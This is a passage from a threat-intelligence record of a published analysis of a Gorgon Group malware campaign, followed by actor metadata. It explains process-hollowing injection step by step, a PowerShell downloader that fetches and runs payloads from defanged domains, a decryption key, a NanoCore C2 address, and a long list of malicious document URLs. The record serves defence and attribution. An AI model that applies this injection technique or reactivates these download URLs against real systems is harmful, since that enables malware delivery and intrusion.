The function will take another executable embedded in the initial Trojan as a resource named \"M\",\r\nwhich it attempts to inject into the following process to execute:\r\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe\r\nWhile it's configured to inject into cvtres.exe, the Trojan is also capable of injecting its code into the following process as\r\nwell:\r\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe\r\nEmbedded injector Trojan\r\nThe R payload discussed above is nothing more than an injector Trojan, which accepts a path to an executable and a buffer\r\nof code to inject into the process as arguments. The R payload will create a process using the supplied path using the\r\nCreateProcessA API function. The payload then finds the base address of the newly created process using the\r\nGetThreadContext API function, and then calls NtUnmapViewOfSection to hollow the process. The payload then calls the\r\nVirtualAllocEx API to create a buffer in the newly hollowed process and the WriteProcessMemory API to write the supplied\r\ndata buffer that contains the code to inject to this newly created buffer. The payload then sets EIP to the entry point of the\r\nnewly injected code using the SetThreadContext API, and finally calls the NtAlertResumeThread API function to run the\r\ninjected code.\r\nEmbedded Downloader Trojan\r\nThe M payload (referenced previously along with the R payload, above) injected and executed within the memory space of\r\nthe other process is a downloader Trojan. This specific downloader appears to have been created using a VB2Exe tool, as the\r\nfunctional code that carries out the downloading functionality exists as a VBScript embedded within the payload. The\r\npayload extracts this VBScript from a resource and saves it to a file that it extracts from another resource. The filename used\r\nto save the VBScript is \"khm.vbs\", which is eventually run using \"wscript\". 
The VBScript has a SHA256 hash of\r\n649e3922ec53d5b195ed23aac08148faeb561f47e891b1e6ff60a2a9df4fea17; it calls two PowerShell commands, one to\r\ndownload and execute a payload and one to download and open a decoy document. The payload is downloaded from the\r\nfollowing location and saved to \"%PUBLIC%\\svchost32.exe\":\r\nhxxp://lokipanelhostingpanel[.]gq/work/kh/1s.exe\r\nThe decoy document is downloaded from hxxp://lokipanelhostingpanel[.]gq/work/kh/1.docx and saved to\r\n\"%PUBLIC%\\svchost32.docx\". When opened, the decoy document shows the following content, which contains the image\r\nand copied text from a news article titled “Top civil-military body rejects Nawaz’s controversial statement on Mumbai\r\nattacks,” as seen in the following screenshot:\r\nFigure 17. Decoy document downloaded by malware\r\nFinal Payload\r\nThe final payload is a dropper Trojan that installs the NanoCore RAT. The author of this payload (SHA256:\r\n690fc694b0840dbabb462ae46eb836777420b3354e53a6944a2e169b965b0bec) appears to have used an open source tool\r\ncalled \"Saransh Email System\" as the basis for this tool, which was likely downloaded from hxxp://www.a1vbcode[.]com/app-4601.asp. Much like the original payload, this tool uses if/else statements to skip the legitimate code in the Saransh Email\r\nSystem source and run the malicious functions, which have the same method names as the original tool and follow the same\r\ncall sequence:\r\n1. Form1.Speed\r\n2. Form1.diomadnfagaghagh\r\n3. Form1.fjcsERIfjfiojsGHIsdifjksi\r\n4. Form1.gsgjIDJIGJIGJIGJIFDOSpl\r\n5. 
Form1.FJaioefgkaoeK\r\nThis chain of functions eventually loads a resource named 'GSrdofjksrgj', which the tool decrypts using the same algorithm\r\nand key as in the initial payload:\r\nbyte[] array4 = new byte[]\r\n{\r\n    19, 129, 43, 37, 56, 65, 255, 75, 111, 19, 211, 120, 0, 49, 126, 248\r\n};\r\nThe decrypted payload has a SHA256 hash of\r\n5e805a88294f6d25d55103d19d13e798e01ad70e6b89e9c58db5d468cc63b3d5, which is a variant of the NanoCore remote\r\nadministration tool. This variant of NanoCore was configured to communicate with the following IP address as its C2 server\r\nover TCP port 6666:\r\n115.186.136[.]237\r\nBitly short URLs and expanded domains\r\nShort Bitly URL Expanded URL\r\nhttp://bit[.]ly/Loaloding http://www.asaigoldenrice[.]com/daq/doc/2.doc\r\nhttp://bit[.]ly/Loadingnnsa http://onedrivenet[.]xyz/work/docnew/4.doc\r\nhttp://bit[.]ly/2JmQLW6 http://stemtopx[.]com/work/doc/13.doc\r\nhttp://bit[.]ly/2JsruKm http://stemtopx[.]com/work/doc/4.doc\r\nhttp://bit[.]ly/2GUaY49 http://fast-cargo[.]com/images/file/vb/VBS/doc/3.doc\r\nhttp://bit[.]ly/Loadingnns http://onedrivenet[.]xyz/work/docnew/4.doc\r\nhttp://bit[.]ly/2Im2IOF http://panelonetwothree[.]ml/zico/doc/doc8/zloadings.doc\r\nhttp://bit[.]ly/primeload http://fast-cargo[.]com/images/file/vb/VBS/doc/1.doc\r\nhttp://bit[.]ly/loader2018 http://asaigoldenrice[.]com/sim/new.doc\r\nhttp://bit[.]ly/2xZ1kO6wdscsac http://stemtopx[.]com/work/doc/3.doc\r\nhttp://bit[.]ly/2M2bIYh http://stemtopx[.]com/work/doc/root.doc\r\nhttp://bit[.]ly/2r9PSIv 
http://stevemike-fireforce[.]info/work/doc/11.doc\r\nhttp://bit[.]ly/Loadiendg http://www.0-day[.]us/img/doc/6.doc\r\nhttp://bit[.]ly/2rpmJKsrdtrdtdfysersgerstrdFCGRDR http://stevemikeforce[.]com/work/doc/7.doc\r\nhttp://bit[.]ly/2Fu4ZSfloading http://panelonetwothree[.]ml/zico/xe/snoop/ocsnoop/snoop.doc\r\nhttp://bit[.]ly/2HloaderqVbva http://diamondfoxpanel[.]ml/doc/1/11.doc\r\nhttp://bit[.]ly/Loardising http://onedrivenet[.]xyz/work/docnew/12.doc\r\nhttp://bit[.]ly/2JB3KXD http://stemtopx[.]com/work/doc/8.doc\r\nhttp://bit[.]ly/1_loadingH7TvJa http://diamondfoxpanel[.]ml/doc/1.doc\r\nhttp://bit[.]ly/Loadijging http://onedrivenet[.]xyz/work/docnew/8.doc\r\nhttp://bit[.]ly/Laodiingplease http://onedrivenet[.]xyz/work/docnew/13.doc\r\nhttp://bit[.]ly/2HvQBirEam832ASADx http://stevemike-fireforce[.]info/work/dola/3.doc\r\nhttp://bit[.]ly/2I5T7b9hgvgvjcVYVY http://stevemikeforce[.]com/work/doc/6.doc\r\nhttp://bit[.]ly/paymentsuae http://brevini-france[.]cf/xp/doc/swift.doc\r\nhttp://bit[.]ly/Laodingipleasewait http://www.asaigoldenrice[.]com/daq/doc/10.doc\r\nhttp://bit[.]ly/loadingxxxx http://www.asaigoldenrice[.]com/daq/doc/4.doc\r\nhttp://bit[.]ly/2Gmziko http://zupaservices[.]info/doc/z.doc\r\nhttp://bit[.]ly/2sQhJOO http://stemtopx[.]com/work/doc/6.doc\r\nhttp://bit[.]ly/laodinfokqaw http://stevemike-fireforce[.]info/work/doc/5.doc\r\nhttp://bit[.]ly/loadrinfing http://www.asaigoldenrice[.]com/daq/doc/15.doc\r\nhttp://bit[.]ly/2JaBgAS http://acorn-paper[.]com/administrator/help/7.doc\r\nhttp://bit[.]ly/2loadingqlOQcM http://diamondfoxpanel[.]ml/doc/4/44.doc\r\nhttp://bit[.]ly/loardding http://fast-cargo[.]com/images/file/vb/VBS/doc/11.doc\r\nhttp://bit[.]ly/loidaring https://www.0-day[.]us/img/doc/5.doc\r\nhttp://bit[.]ly/LoadingPleaseWait http://www.asaigoldenrice[.]com/daq/doc/20.doc\r\nhttp://bit[.]ly/2HJv5Ud http://stevemike-fireforce[.]info/work/doc/1.doc\r\nhttp://bit[.]ly/Loading13 
http://fast-cargo[.]com/images/file/vb/VBS/doc/13.doc\r\nhttp://bit[.]ly/2Lzpjp1 http://stemtopx[.]com/work/doc/19.doc\r\nhttp://bit[.]ly/tt_seafood http://acorn-paper[.]com/administrator/help/en-GB/8.doc\r\nhttp://bit[.]ly/Lording http://fast-cargo[.]com/images/file/vb/VBS/doc/7.doc\r\nhttp://bit[.]ly/loadingsmins http://www.asaigoldenrice[.]com/daq/doc/1.doc\r\nhttp://bit[.]ly/2_loadingJwkhJA http://diamondfoxpanel[.]ml/doc/7.doc\r\nhttp://bit[.]ly/Laodiingpleasesa http://onedrivenet[.]xyz/work/docnew/13.doc\r\nhttp://bit[.]ly/2tnW5lu http://stemtopx[.]com/work/newdoc/1.doc\r\nhttp://bit[.]ly/tt_loading http://acorn-paper[.]com/administrator/components/com_templates/4.doc\r\nhttp://bit[.]ly/2wzkloading http://panelonetwothree[.]ml/zico/doc/zloading.doc\r\nhttp://bit[.]ly/Loadingans http://onedrivenet[.]xyz/work/docnew/14.doc\r\nhttp://bit[.]ly/2r9jLcQloading http://panelonetwothree[.]ml/zico/doc/zik.doc\r\nhttp://bit[.]ly/loadingpleasewairrs http://stevemike-fireforce[.]info/work/dola/2.doc\r\nhttp://bit[.]ly/2arubabKmpgwP http://panelonetwothree[.]ml/iran/uae/done/oc/uae.doc\r\nhttp://bit[.]ly/2HAwzmN3290293sadjokwwadjoW http://stevemike-fireforce[.]info/work/doc/12.doc\r\nhttp://bit[.]ly/loadingasz http://0-day[.]us/img/doc/10.doc\r\nhttp://bit[.]ly/ntissa2vFamys http://acorn-paper[.]com/images/locations/thumbnails/oc/m.doc\r\nhttp://bit[.]ly/2IgzmRxEmasidE9kEjidlE http://panelonetwothree[.]ga/work/doc/3.doc\r\nhttp://bit[.]ly/2JqmuWp http://stemtopx[.]com/work/doc/16.doc\r\nhttp://bit[.]ly/load242HmFqZ6 http://panelonetwothree[.]ml/simon/exp/oc/mm.doc\r\nhttp://bit[.]ly/2L17QGqloading http://panelonetwothree[.]ml/zico/doc/doc8/zxloading.doc\r\nhttp://bit[.]ly/2MarX5t http://stemtopx[.]com/work/doc/9.doc\r\nhttp://bit[.]ly/Loadingnix http://www.asaigoldenrice[.]com/daq/doc/3.doc\r\nhttp://bit[.]ly/2HyVGGy_loading 
http://panelonetwothree[.]ml/iran/uae/done/oc1/uae.doc\r\nhttp://bit[.]ly/2H8euros http://acorn-paper[.]com/administrator/components/com_templates/views/2.doc\r\nhttp://bit[.]ly/2I2mUBFstthdhtrhdtyftfyj http://stevemikeforce[.]com/work/doc/8.doc\r\nhttp://bit[.]ly/Loininding http://www.0-day[.]us/img/doc/8.doc\r\nhttp://bit[.]ly/2F02ZRq http://stevemike-fireforce[.]info/work/doc/2.doc\r\nhttp://bit[.]ly/Loadingpleasewait http://onedrivenet[.]xyz/work/docnew/19.doc\r\nhttp://bit[.]ly/2jE36KjhvjhgkHJHKLHGFHJ http://stevemikeforce[.]com/work/doc/3.doc\r\nhttp://bit[.]ly/Waitpleasewait http://stevemike-fireforce[.]info/work/doc/8.doc\r\nhttp://bit[.]ly/Loiading http://fast-cargo[.]com/images/file/newvbs/doc/1.doc\r\nhttp://bit[.]ly/Loadingplasewaitsm http://stevemike-fireforce[.]info/work/doc/3.doc\r\nhttp://bit[.]ly/2jCTHCNasiudhasdASdy7656basdu http://stevemikeforce[.]com/work/doc/2.doc\r\nhttp://bit[.]ly/loadingpleaswaitrr http://stevemike-fireforce[.]info/work/doc/4.doc\r\nhttp://bit[.]ly/Loadingnsi http://onedrivenet[.]xyz/work/docnew/2.doc\r\nhttp://bit[.]ly/2JRUNKh http://www.stemtopx[.]com/work/newdoc/3.doc\r\nhttp://bit[.]ly/2Hload25YdU19 http://panelonetwothree[.]ml/simon/exp/oc/25/m25.doc\r\nhttp://bit[.]ly/2lording http://fast-cargo[.]com/images/file/vb/VBS/doc/8.doc\r\nhttp://bit[.]ly/2M9lLL6 http://stemtopx[.]com/work/doc/15.doc\r\nhttp://bit[.]ly/Loggeding http://fast-cargo[.]com/images/file/newvbs/doc/4.doc\r\nhttp://bit[.]ly/Loadingwaitplez http://stevemike-fireforce[.]info/work/doc/10.doc\r\nhttp://bit[.]ly/ASDj23234j4oDj3234Sdmk http://stevemike-fireforce[.]info/work/doc/5.doc\r\nhttp://bit[.]ly/2JloadingspWgLs2 http://acorn-paper[.]com/components/com_content/models/oc/s.doc\r\nhttp://bit[.]ly/Loadingpleasewaitnn http://stevemike-fireforce[.]info/work/dola/4.doc\r\nhttp://bit[.]ly/2sPe3wZrdtrdytd 
http://stemtopx[.]com/work/doc/2.doc\r\nhttp://bit[.]ly/LAdooing http://onedrivenet[.]xyz/work/docnew/6.doc\r\nhttp://bit[.]ly/LoadIng http://guelphupholstery[.]com/images/yupsia/doc/62.doc\r\nhttp://bit[.]ly/2JnMVQz http://stemtopx[.]com/work/doc/14.doc\r\nhttp://bit[.]ly/DocumentIsLoadingPleasewait http://stemtopx[.]com/work/i/2.doc\r\nhttp://bit[.]ly/2HVD1Bh http://fast-cargo[.]com/images/file/vb/VBS/doc/4.doc\r\nhttp://bit[.]ly/2uoqexc http://zupaservices[.]info/doc/1.doc\r\nhttp://bit[.]ly/2vXgnqdASdj2929iqwSdu9iw9i http://stevemike-fireforce[.]info/work/doc/13.doc\r\nhttp://bit[.]ly/4_loadingEwHlnA http://diamondfoxpanel[.]ml/doc/4.doc\r\nhttp://bit[.]ly/lLoadingl9 http://fast-cargo[.]com/images/file/vb/VBS/doc/9.doc\r\nhttp://bit[.]ly/LlLoadinG https://www.0-day[.]us/img/doc/2.doc\r\nhttp://bit[.]ly/2kTPwmFdrwfdtsfdfyr http://stemtopx[.]com/work/doc/1.doc\r\nhttp://bit[.]ly/2G34tww http://fast-cargo[.]com/old/images/file/vb/VBS/smon/doc/testa.doc\r\nhttp://bit[.]ly/2HvQBir http://stevemike-fireforce[.]info/work/dola/3.doc\r\nhttp://bit[.]ly/golden_uae http://fast-cargo[.]com/old/images/file/vb/VBS/smon/doc/xchange.doc\r\nhttp://bit[.]ly/pele2HROHp1 http://acorn-paper[.]com/images/locations/thumbnails/z/oc/z.doc\r\nhttp://bit[.]ly/2rlqLDBMSloading http://panelonetwothree[.]ml/iran/uae/done/oc2/uae.doc\r\nhttp://bit[.]ly/2JDUVMC http://stemtopx[.]com/work/doc/11.doc\r\nhttp://bit[.]ly/2K1GYVgtyfctftfTFTYFUFtufutfu http://stevemikeforce[.]com/work/doc/11.doc\r\nhttp://bit[.]ly/2Jr4dby http://stemtopx[.]com/work/doc/18.doc\r\nhttp://bit[.]ly/2M9I8z4 http://stemtopx[.]com/work/newdoc/2.doc\r\nhttp://bit[.]ly/ASD8239ASdmkWi38AS http://stevemike-fireforce[.]info/work/dola/4.doc\r\nhttp://bit[.]ly/LoadingPelasewaits http://stevemike-fireforce[.]info/work/docnew/2.doc\r\nhttp://bit[.]ly/2JnNtG7 
http://stemtopx[.]com/work/doc/17.doc\r\nhttp://bit[.]ly/shawclk2HZJXOr http://panelonetwothree[.]ml/simon/exp/25exp/26/doc/final/26.doc\r\nhttp://bit[.]ly/loadijgng http://onedrivenet[.]xyz/work/docnew/9.doc\r\nhttp://bit[.]ly/PleaseWaitLoading http://www.asaigoldenrice[.]com/daq/doc/7.doc\r\nhttp://bit[.]ly/Loadinger http://onedrivenet[.]xyz/work/docnew/1.doc\r\nhttp://bit[.]ly/Workingwait http://onedrivenet[.]xyz/work/docnew/21.doc\r\nhttp://bit[.]ly/Loadingplzwait http://www.asaigoldenrice[.]com/daq/doc/5.doc\r\nhttp://bit[.]ly/2HuOFBQ http://stemtopx[.]com/work/doc/5.doc\r\nhttp://bit[.]ly/LoadingPleasewait1 http://onedrivenet[.]xyz/work/docnew/20.doc\r\nhttp://bit[.]ly/LlOrRinding http://www.0-day[.]us/img/doc/11.doc\r\nhttp://bit[.]ly/Loadingwaitplzz http://onedrivenet[.]xyz/work/docnew/16.doc\r\nhttp://bit[.]ly/2HWdrzTgfufuyfkCTYTDFYTgtfutf http://stevemikeforce[.]com/work/doc/12.doc\r\nhttp://bit[.]ly/2KHEnRKxestrhdyhdDTDRDTRthdydy http://stevemikeforce[.]com/work/doc/10.doc\r\nhttp://bit[.]ly/unkwonas http://asaigoldenrice[.]com/sim/new.vbs\r\nhttp://bit[.]ly/Laodiingpleasewait http://onedrivenet[.]xyz/work/docnew/13.doc\r\nhttp://bit[.]ly/wordxchange http://asaigoldenrice[.]com/sim/doc/kalu.doc\r\nhttp://bit[.]ly/Loadsinfpleasewait http://onedrivenet[.]xyz/work/docnew/30.docx\r\nhttp://bit[.]ly/Loardsing http://www.0-day[.]us/img/doc/7.doc\r\nhttp://bit[.]ly/2ImbyrQ http://acorn-paper[.]com/administrator/6.doc\r\nhttp://bit[.]ly/LoadingPleasewait http://onedrivenet[.]xyz/work/docnew/20.doc\r\nDomains\r\nFor a list of domains encountered in use by malware throughout this campaign, please refer to the following file.\r\nHashes\r\nFor a list of all hashes of malware encountered during this campaign, please refer to the following file.\r\nSource: 
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/"
	],
	"report_names": [
		"unit42-gorgon-group-slithering-nation-state-cybercrime"
	],
	"threat_actors": [
		{
			"id": "414d7c65-5872-4e56-8a7d-49a2aeef1632",
			"created_at": "2025-08-07T02:03:24.7983Z",
			"updated_at": "2026-04-10T02:00:03.76109Z",
			"deleted_at": null,
			"main_name": "COPPER FIELDSTONE",
			"aliases": [
				"APT36 ",
				"Earth Karkaddan ",
				"Gorgon Group ",
				"Green Havildar ",
				"Mythic Leopard ",
				"Operation C-Major ",
				"Operation Transparent Tribe ",
				"Pasty Draco ",
				"ProjectM ",
				"Storm-0156 "
			],
			"source_name": "Secureworks:COPPER FIELDSTONE",
			"tools": [
				"CapraRAT",
				"Crimson RAT",
				"DarkComet",
				"ElizaRAT",
				"LuminosityLink",
				"ObliqueRAT",
				"Peppy",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "18278778-fa63-4a9a-8988-4d266b8c5c1a",
			"created_at": "2023-01-06T13:46:38.769816Z",
			"updated_at": "2026-04-10T02:00:03.094179Z",
			"deleted_at": null,
			"main_name": "The Gorgon Group",
			"aliases": [
				"Gorgon Group",
				"Subaat",
				"ATK92",
				"G0078",
				"Pasty Gemini"
			],
			"source_name": "MISPGALAXY:The Gorgon Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "97fdaf9f-cae1-4ccc-abe2-76e5cbc0febd",
			"created_at": "2022-10-25T15:50:23.296989Z",
			"updated_at": "2026-04-10T02:00:05.347085Z",
			"deleted_at": null,
			"main_name": "Gorgon Group",
			"aliases": [
				"Gorgon Group"
			],
			"source_name": "MITRE:Gorgon Group",
			"tools": [
				"NanoCore",
				"QuasarRAT",
				"Remcos",
				"njRAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "6c4e4b91-1f98-49e2-90e6-435cea8d3d53",
			"created_at": "2022-10-25T16:07:23.693797Z",
			"updated_at": "2026-04-10T02:00:04.711987Z",
			"deleted_at": null,
			"main_name": "Gorgon Group",
			"aliases": [
				"ATK 92",
				"G0078",
				"Pasty Draco",
				"Subaat",
				"TAG-CR5"
			],
			"source_name": "ETDA:Gorgon Group",
			"tools": [
				"AgenTesla",
				"Agent Tesla",
				"AgentTesla",
				"Atros2.CKPN",
				"Bladabindi",
				"CinaRAT",
				"Crimson RAT",
				"ForeIT",
				"Jorik",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Loki",
				"Loki.Rat",
				"LokiBot",
				"LokiPWS",
				"MSIL",
				"MSIL/Crimson",
				"Nancrat",
				"NanoCore",
				"NanoCore RAT",
				"Negasteal",
				"NetWeird",
				"NetWire",
				"NetWire RAT",
				"NetWire RC",
				"NetWired RC",
				"Origin Logger",
				"Quasar RAT",
				"QuasarRAT",
				"Recam",
				"Remcos",
				"RemcosRAT",
				"Remvio",
				"Revenge RAT",
				"RevengeRAT",
				"Revetrat",
				"SEEDOOR",
				"Scarimson",
				"Socmer",
				"Yggdrasil",
				"ZPAQ",
				"Zurten",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434868,
	"ts_updated_at": 1775792156,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/00b5096fa62da3207a20ccc6fe9d0a029f88780c.pdf",
		"text": "https://archive.orkl.eu/00b5096fa62da3207a20ccc6fe9d0a029f88780c.txt",
		"img": "https://archive.orkl.eu/00b5096fa62da3207a20ccc6fe9d0a029f88780c.jpg"
	}
}